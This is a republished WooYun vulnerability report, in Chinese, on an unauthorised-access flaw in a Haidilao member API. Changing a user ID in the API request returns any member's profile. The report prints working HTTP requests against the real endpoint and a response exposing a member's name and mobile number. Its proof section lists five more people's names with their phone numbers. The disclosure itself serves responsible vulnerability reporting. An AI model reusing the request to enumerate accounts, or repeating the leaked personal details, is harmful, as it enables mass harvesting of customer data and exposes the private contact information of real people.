海底捞某接口可遍历查询千万会员信息（姓名/性别/手机号/会员等级）

2017年4月29日22:36:23评论496 views字数 226阅读0分45秒阅读模式

摘要

2016-03-08：细节已通知厂商并且等待厂商处理中
2016-03-08：厂商已经确认，细节仅向厂商公开
2016-03-18：细节向核心白帽子及相关领域专家公开
2016-03-28：细节向普通白帽子公开
2016-04-07：细节向实习白帽子公开
2016-04-22：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-182271

漏洞标题：海底捞某接口可遍历查询千万会员信息（姓名/性别/手机号/会员等级）

漏洞作者：撸撸侠

提交时间： 2016-03-08 16:02

公开时间： 2016-04-22 16:07

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

1人收藏

漏洞详情

披露状态：

简要描述：

海底捞某接口可遍历查询千万会员信息（姓名/性别/手机号/会员等级）
配合刚才那个漏洞，更可以遍历千万会员信息加用户画像

详细说明：

code 区域

POST /Cater/app/proxyApp.action?model=1&uri=getuserinfo HTTP/1.1
 Host: cater.haidilao.com
 Proxy-Connection: keep-alive
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
 DNT: 1
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
 Cookie: 
 Content-Length: 32
 
 <body><uid>12100004</uid></body>

code 区域

<body>
   <reponseresult>
     <returncode>300</returncode>
     <returnmsg>success</returnmsg>
   </reponseresult>
   <userform>
     <userid>12100004</userid>
     <isme></isme>
     <ismyfriend>0</ismyfriend>
     <nickname>黄杰</nickname>
     <sex>0</sex>
     <level>1</level>
     <email></email>
     <follownum>0</follownum>
     <reportnum>0</reportnum>
     <followednum>0</followednum>
     <personalpoint>0</personalpoint>
     <description></description>
     <location></location>
     <atmenum>0</atmenum>
     <mobile>18892637702</mobile>
     <phone></phone>
     <discount></discount>
     <specific></specific>
     <waiter></waiter>
     <storename></storename>
     <isStroe></isStroe>
     <clientid></clientid>
     <src></src>
     <physical></physical>
     <personality></personality>
     <cusdiscount></cusdiscount>
     <attendance></attendance>
   </userform>
 </body>

code 区域

POST /Cater/app/proxyApp.action?model=1&uri=getuserinfo HTTP/1.1
 Host: cater.haidilao.com
 Proxy-Connection: keep-alive
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
 DNT: 1
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
 Cookie: 
 Content-Length: 33
 
 <body><uid>001055030</uid></body>

漏洞证明：

玲琳 15072366988

雷改祥 15890506507

黄冬辉 17751789669

孟肖 13586235896

曹海霞 18809340111

修复方案：

版权声明：转载请注明来源撸撸侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-03-08 16:07

厂商回复：

谢谢您的反馈，我们已安排人员进行修复。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-08 16:03 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

1

不会是Sns**那个吧

1# 回复此人
2016-03-08 16:03 | 百度谷歌bing狗一下 ( 路人 | Rank:21 漏洞数:4 | 学到老活到老!)

1

6块麻辣烫,谢谢!

2# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-182271

漏洞标题： 海底捞某接口可遍历查询千万会员信息（姓名/性别/手机号/会员等级）

相关厂商： haidilao.com

漏洞作者： 撸撸侠

提交时间： 2016-03-08 16:02

公开时间： 2016-04-22 16:07

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：海底捞某接口可遍历查询千万会员信息（姓名/性别/手机号/会员等级）

漏洞作者：撸撸侠

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

版权声明：转载请注明来源撸撸侠@乌云

漏洞评价(共0人评价):

登陆后才能进行评分